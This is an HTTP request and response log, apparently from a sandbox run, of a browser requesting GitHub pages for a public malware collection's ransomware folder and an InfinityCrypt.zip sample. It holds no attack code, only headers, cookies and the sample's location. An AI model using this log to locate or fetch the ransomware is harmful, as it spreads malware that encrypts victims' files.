cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:38 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"5a51a7d078f66d39672ccfcc5dd4ea91"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1190
x-github-request-id: F456:3129D7:19ADD56:1C59FE5:66426E8D
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:39 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e61453a6d8b82727dfe87839b3fc469c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 177
x-github-request-id: F456:3129D7:19ADDED:1C5A092:66426E97
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:39 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"2f35a548192aa4c7f03cb33866cc9d1e"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 845
x-github-request-id: F456:3129D7:19ADDED:1C5A091:66426E97
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:39 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"f83a010fbefa189dcd951a943d55e7c6"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 432
x-github-request-id: F456:3129D7:19ADDED:1C5A090:66426E96
-
GEThttps://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json
dnt: 1
x-requested-with: XMLHttpRequest
x-github-target: dotcom
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:51 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"59c39b985fb87f3284bd3da75e06bc4e"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1924
x-github-request-id: F456:3129D7:19AE41F:1C5A75F:66426E97
-
GEThttps://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:52 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"c8ab689529221c0372d19cb7fd8b8912"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 441
x-github-request-id: F456:3129D7:19AE454:1C5A795:66426EA3
-
GEThttps://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:52 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e61453a6d8b82727dfe87839b3fc469c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
